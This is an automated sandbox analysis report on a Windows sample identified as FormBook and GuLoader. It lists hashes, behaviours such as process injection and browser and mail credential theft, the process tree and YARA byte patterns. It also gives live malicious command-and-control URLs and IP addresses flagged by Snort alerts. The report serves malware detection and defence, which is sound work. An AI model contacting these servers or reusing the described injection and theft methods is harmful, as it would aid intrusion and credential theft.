Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Antndte.exe

Overview

General Information

Sample name:Antndte.exe
Analysis ID:1353242
MD5:b56bb86c217f7a77d3f862acf4ecdbe6
SHA1:665a33c13323e71fd440bb685f417cc279190b37
SHA256:13a9d7b568ad553f15ab6174f7381c07e1f4d93616d9be70e1b6c3c7c0de69f4
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
Yara detected GuLoader
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • Antndte.exe (PID: 8040 cmdline: C:\Users\user\Desktop\Antndte.exe MD5: B56BB86C217F7A77D3F862ACF4ECDBE6)
    • Antndte.exe (PID: 2384 cmdline: C:\Users\user\Desktop\Antndte.exe MD5: B56BB86C217F7A77D3F862ACF4ECDBE6)
      • czazZqNSMxullu.exe (PID: 2852 cmdline: "C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • rundll32.exe (PID: 6208 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: 889B99C52A60DD49227C5E485A016679)
          • czazZqNSMxullu.exe (PID: 8076 cmdline: "C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6064 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.14740359310.0000000002D40000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.14740359310.0000000002D40000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x278a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13c8f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000005.00000002.14739186182.00000000007F0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.14739186182.00000000007F0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x278a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13c8f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.10110004110.0000000035460000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 12 entries

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        Timestamp:192.168.11.2037.97.254.2750140802855464 12/04/23-15:23:26.404582
        SID:2855464
        Source Port:50140
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2076.76.21.14250180802855464 12/04/23-15:25:43.704528
        SID:2855464
        Source Port:50180
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20108.179.192.3450198802855464 12/04/23-15:27:06.558710
        SID:2855464
        Source Port:50198
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2091.195.240.1950169802855464 12/04/23-15:25:05.275269
        SID:2855464
        Source Port:50169
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2037.97.254.2750195802855464 12/04/23-15:26:55.551474
        SID:2855464
        Source Port:50195
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20198.177.123.10650202802855464 12/04/23-15:27:19.957865
        SID:2855464
        Source Port:50202
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20217.160.0.2750216802855465 12/04/23-15:28:06.351089
        SID:2855465
        Source Port:50216
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20217.160.0.2750213802855464 12/04/23-15:27:58.198613
        SID:2855464
        Source Port:50213
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20104.232.106.16550162802855464 12/04/23-15:24:40.749060
        SID:2855464
        Source Port:50162
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20198.252.98.6450205802855464 12/04/23-15:27:30.868265
        SID:2855464
        Source Port:50205
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2089.31.143.9050165802855464 12/04/23-15:24:51.619983
        SID:2855464
        Source Port:50165
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2091.195.240.11750157802855464 12/04/23-15:24:23.940310
        SID:2855464
        Source Port:50157
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20216.40.34.4150138802855464 12/04/23-15:23:18.008509
        SID:2855464
        Source Port:50138
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2091.195.240.1950176802855464 12/04/23-15:25:29.947701
        SID:2855464
        Source Port:50176
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2091.195.240.11750156802855464 12/04/23-15:24:21.233377
        SID:2855464
        Source Port:50156
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2091.195.240.11750210802855464 12/04/23-15:27:46.989673
        SID:2855464
        Source Port:50210
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2091.195.240.1950230802855464 12/04/23-15:28:55.475392
        SID:2855464
        Source Port:50230
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2023.227.38.7450218802855464 12/04/23-15:28:14.411942
        SID:2855464
        Source Port:50218
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20198.177.123.10650149802855464 12/04/23-15:23:56.564327
        SID:2855464
        Source Port:50149
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20108.179.192.3450145802855464 12/04/23-15:23:43.041183
        SID:2855464
        Source Port:50145
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2076.76.21.14250181802855464 12/04/23-15:25:46.319391
        SID:2855464
        Source Port:50181
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2074.208.236.24350186802855464 12/04/23-15:26:18.044367
        SID:2855464
        Source Port:50186
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2074.208.236.24350132802855464 12/04/23-15:22:51.031161
        SID:2855464
        Source Port:50132
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20198.252.98.6450206802855464 12/04/23-15:27:33.556193
        SID:2855464
        Source Port:50206
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20198.177.123.10650148802855464 12/04/23-15:23:53.859838
        SID:2855464
        Source Port:50148
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20172.67.202.15150172802855464 12/04/23-15:25:16.414796
        SID:2855464
        Source Port:50172
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2091.195.240.1950224802855465 12/04/23-15:28:33.292427
        SID:2855465
        Source Port:50224
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2089.117.169.14050233802855465 12/04/23-15:29:06.684862
        SID:2855465
        Source Port:50233
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20198.252.98.6450153802855464 12/04/23-15:24:10.287144
        SID:2855464
        Source Port:50153
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2023.227.38.7450217802855464 12/04/23-15:28:11.796370
        SID:2855464
        Source Port:50217
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2091.195.240.11750209802855464 12/04/23-15:27:44.287436
        SID:2855464
        Source Port:50209
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20172.67.202.15150173802855464 12/04/23-15:25:19.028644
        SID:2855464
        Source Port:50173
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2074.208.236.24350185802855464 12/04/23-15:26:15.404471
        SID:2855464
        Source Port:50185
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2074.208.236.24350133802855464 12/04/23-15:22:53.683531
        SID:2855464
        Source Port:50133
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2091.195.240.1950177802855464 12/04/23-15:25:32.660419
        SID:2855464
        Source Port:50177
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2091.184.0.20050225802855464 12/04/23-15:28:39.281903
        SID:2855464
        Source Port:50225
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2091.184.0.20050228802855465 12/04/23-15:28:47.395926
        SID:2855465
        Source Port:50228
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2091.195.240.1950229802855464 12/04/23-15:28:52.772299
        SID:2855464
        Source Port:50229
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2091.195.240.1950168802855464 12/04/23-15:25:02.576416
        SID:2855464
        Source Port:50168
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20198.252.98.6450152802855464 12/04/23-15:24:07.593823
        SID:2855464
        Source Port:50152
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20198.177.123.10650201802855464 12/04/23-15:27:17.252864
        SID:2855464
        Source Port:50201
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2037.97.254.2750193802855464 12/04/23-15:26:50.161400
        SID:2855464
        Source Port:50193
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20108.179.192.3450197802855464 12/04/23-15:27:03.918009
        SID:2855464
        Source Port:50197
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20104.232.106.16550160802855464 12/04/23-15:24:35.373199
        SID:2855464
        Source Port:50160
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20108.179.192.3450144802855464 12/04/23-15:23:40.397599
        SID:2855464
        Source Port:50144
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2037.97.254.2750194802855464 12/04/23-15:26:52.856779
        SID:2855464
        Source Port:50194
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20216.40.34.4150191802855464 12/04/23-15:26:42.213639
        SID:2855464
        Source Port:50191
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2037.97.254.2750141802855464 12/04/23-15:23:29.103007
        SID:2855464
        Source Port:50141
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2091.195.240.1950221802855464 12/04/23-15:28:25.186374
        SID:2855464
        Source Port:50221
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2091.195.240.1950222802855464 12/04/23-15:28:27.886938
        SID:2855464
        Source Port:50222
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20216.40.34.4150136802855464 12/04/23-15:23:12.728913
        SID:2855464
        Source Port:50136
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2089.31.143.9050164802855464 12/04/23-15:24:48.913010
        SID:2855464
        Source Port:50164
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20216.40.34.4150137802855464 12/04/23-15:23:15.367647
        SID:2855464
        Source Port:50137
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2023.227.38.7450220802855465 12/04/23-15:28:19.660556
        SID:2855465
        Source Port:50220
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.2091.184.0.20050226802855464 12/04/23-15:28:41.994136
        SID:2855464
        Source Port:50226
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20216.40.34.4150189802855464 12/04/23-15:26:36.932413
        SID:2855464
        Source Port:50189
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20217.160.0.2750214802855464 12/04/23-15:28:00.914663
        SID:2855464
        Source Port:50214
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20104.232.106.16550161802855464 12/04/23-15:24:38.061121
        SID:2855464
        Source Port:50161
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.11.20216.40.34.4150190802855464 12/04/23-15:26:39.573354
        SID:2855464
        Source Port:50190
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Antivirus detection for URL or domain
        Source: http://www.vaultedjewelry.com/3hr5/?TZd=EijkiYqzwZN1BhBpIykWY0SibsexD2BbsSiB3fZdeNuUj8Ukz47SSRBmN8cMCE5z6SXuPEOXWwW1mi1FwYWeXvEwrZlQEKUUXQ==&1dr=yP5PQD38Avira URL Cloud: Label: malware
        Source: http://www.neuvillette.org/3hr5/?TZd=q1X/IYN8eKewuN13aiQWFCouSmM7D+QNK5N6gfBg5YPvN3u/YjmPX9Swyhyhl1JXW1KA5roj8jCGf76SGeGao+TTCbXI7mNU4g==&1dr=yP5PQD38Avira URL Cloud: Label: malware
        Source: http://www.littlehappiez.com/3hr5/Avira URL Cloud: Label: malware
        Source: http://www.echolinkevolve.xyz/3hr5/?TZd=uCimyMqR3nEPval29bDaQI/GbNlN6Dg0WFpqpEFKdFHS+eYsrsaspyvmyOxFyB19ijhk+19h03NhCcIlFptZsCN8ir2ans2GUg==&1dr=yP5PQD38Avira URL Cloud: Label: malware
        Source: http://www.brls.money/3hr5/Avira URL Cloud: Label: malware
        Source: http://www.littlehappiez.com/3hr5/?TZd=KIDVo8Keffnboaw8XoMrozoth4xFJ4fk1ZVbA+0ZIyIjkFdoyEHsPjmNeaT/UPsvPUpfCXSZX3H43JcvkGtZbEcm0CWLYl5Piw==&gpo=NNNtyBQpfR9tJN1Avira URL Cloud: Label: malware
        Source: http://www.echolinkevolve.xyz/3hr5/Avira URL Cloud: Label: malware
        Source: http://www.brls.money/3hr5/?TZd=RBcnSiCg0exgPH7+amvyuffzGD4zp5v5QJzpEWhW15793hPIewihv82rGn5Qh8bR9T1h4/autzf2BuR5sC2Gt8s6p4k4sTzt/A==&1dr=yP5PQD38Avira URL Cloud: Label: malware
        Source: http://www.neuvillette.org/3hr5/Avira URL Cloud: Label: malware
        Source: http://www.vaultedjewelry.com/3hr5/Avira URL Cloud: Label: malware
        Multi AV Scanner detection for submitted file
        Source: Antndte.exeReversingLabs: Detection: 16%
        Yara detected FormBook
        Source: Yara matchFile source: 00000005.00000002.14740359310.0000000002D40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.14739186182.00000000007F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.10110004110.0000000035460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.14741531254.0000000000730000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.14740130735.0000000002D00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.10110872390.0000000035AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.14743512323.00000000026C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Antndte.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 142.250.80.46:443 -> 192.168.11.20:50129 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.251.41.1:443 -> 192.168.11.20:50130 version: TLS 1.2
        Source: Antndte.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: mshtml.pdb source: Antndte.exe, 00000002.00000001.9887364780.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: czazZqNSMxullu.exe, 00000004.00000002.14741699612.0000000000CAE000.00000002.00000001.01000000.0000000A.sdmp
        Source: Binary string: wntdll.pdbUGP source: Antndte.exe, 00000002.00000003.10003571766.000000003542C000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10007207105.00000000355DA000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Antndte.exe, Antndte.exe, 00000002.00000003.10003571766.000000003542C000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmp, Antndte.exe, 00000002.00000003.10007207105.00000000355DA000.00000004.00000020.00020000.00000000.sdmp, Antndte.exe, 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: rundll32.pdb source: Antndte.exe, 00000002.00000003.10053650494.0000000005419000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: rundll32.pdbGCTL source: Antndte.exe, 00000002.00000003.10053650494.0000000005419000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Antndte.exe, 00000002.00000001.9887364780.0000000000649000.00000020.00000001.01000000.00000007.sdmp
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 0_2_00402862 FindFirstFileW,0_2_00402862
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 0_2_004065C5 FindFirstFileW,FindClose,0_2_004065C5
        Source: C:\Users\user\Desktop\Antndte.exeCode function: 0_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405990

        Networking

        barindex
        Snort IDS alert for network traffic
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50132 -> 74.208.236.243:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50133 -> 74.208.236.243:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50136 -> 216.40.34.41:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50137 -> 216.40.34.41:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50140 -> 37.97.254.27:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50141 -> 37.97.254.27:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50144 -> 108.179.192.34:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50145 -> 108.179.192.34:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50148 -> 198.177.123.106:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50149 -> 198.177.123.106:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50152 -> 198.252.98.64:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50153 -> 198.252.98.64:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50156 -> 91.195.240.117:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50157 -> 91.195.240.117:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50160 -> 104.232.106.165:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50161 -> 104.232.106.165:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50164 -> 89.31.143.90:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50165 -> 89.31.143.90:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50168 -> 91.195.240.19:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50169 -> 91.195.240.19:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50172 -> 172.67.202.151:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50173 -> 172.67.202.151:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50176 -> 91.195.240.19:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50177 -> 91.195.240.19:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50180 -> 76.76.21.142:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50181 -> 76.76.21.142:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50185 -> 74.208.236.243:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50186 -> 74.208.236.243:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50138 -> 216.40.34.41:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50189 -> 216.40.34.41:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50190 -> 216.40.34.41:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50191 -> 216.40.34.41:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50193 -> 37.97.254.27:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50194 -> 37.97.254.27:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50195 -> 37.97.254.27:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50197 -> 108.179.192.34:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50198 -> 108.179.192.34:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50201 -> 198.177.123.106:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50202 -> 198.177.123.106:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50205 -> 198.252.98.64:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50206 -> 198.252.98.64:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50162 -> 104.232.106.165:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50209 -> 91.195.240.117:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50210 -> 91.195.240.117:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50213 -> 217.160.0.27:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50214 -> 217.160.0.27:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:50216 -> 217.160.0.27:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50217 -> 23.227.38.74:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50218 -> 23.227.38.74:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:50220 -> 23.227.38.74:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50221 -> 91.195.240.19:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50222 -> 91.195.240.19:80
        Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.11.20:50224 -> 91.195.240.19:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50225 -> 91.184.0.200:80
        Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:50226 -> 91.184.0.200:80
